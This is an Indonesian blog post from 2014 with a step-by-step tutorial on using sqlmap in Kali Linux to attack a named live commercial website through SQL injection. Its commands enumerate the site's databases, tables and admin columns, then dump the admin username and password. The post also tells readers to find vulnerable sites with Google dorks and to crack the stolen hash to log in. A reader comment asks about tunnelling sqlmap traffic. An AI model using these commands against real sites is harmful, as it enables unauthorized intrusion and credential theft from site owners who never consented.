Tuesday, April 1, 2014

Hacking Website dengan SQLMap di Kali Linux

2 comments

sebelumnya, apa itu sqlmap……???
sqlmap yaitu salah satu tool untuk melakukan penetrasi pada suatu website dengan teknik SQL Injection. Tool ini bersifat free, mungkin pengguna windows sudah kenal dengan havij, sama fungsinya seperti havij bedanya tool ini jalan di console sedangkan havij dengan GUI nya yang tinggal klak-klik saja untuk melakukan penetrasi.
pertama yang harus kita lakukan, adalah mencari website yang terdapat Vuln sql injection. :)
bisa juga dengan google dork untuk mencari website vulnr.
penulis ada kumpulan dork sql injection silahkan download:
dork sql injection 2014

penulis mengunakan live target "http://www.solutionpack.my/products.php?id=9"
1. buka termnal…


2. inilah perbedaannya danga backtrack, kita tidak harus menuju folder sqlmap terlebih dahulu untuk menjalankanya tetapi langsung kita ketikkan perintah berikut :

root@maverick#sqlmap -u http://www.solutionpack.my/products.php?id=9 --dbs


3. terlihat ada 2 database :
[*] information_schema
[*] solution_newgads

selanjutnya kita cari tabel yang ada di database solution_newgads

dengan perintah

root@maverick# sqlmap -u http://www.solutionpack.my/products.php?id=9 -D solution_newgads --tables


4. akan muncul nama-nama kolom dari database tersebut, lalau kita cari isi kolom yang berisi username dan password admin…dengan perinth berikut
  
root@maverick# sqlmap -u http://www.solutionpack.my/products.php?id=9 -D solution_newgads -T admin --columns
5. untuk melihat isi dari kolom dari username dan pasword tersebut tuliskan perintah:

root@maverick# sqlmap -u http://www.solutionpack.my/products.php?id=9 -D solution_newgads -T admin -C  username,password --dump


binggooo kita dapet username sama passwordnya ..........
terkahir kalau sudah mendapatkan paswd dan user admin tinggal cari halaman login, tapi bisnya passwordnya di enkripsi jdi harus di decrypte terlebih dahulu.
sekian tutorial dari saya.....sebagai pembelajaran.
tetap semangat...... keep learn,keep silent coz silent is deadly attack.
hahahaa.

2 Responses so far

  1. Gan apa ada cara agar sqlmap bisa jalan pake cara gretonger? (tsocks;ssh;injector?) coz kalo pake cara itu sqlmap gak berfungsi.

Leave a Reply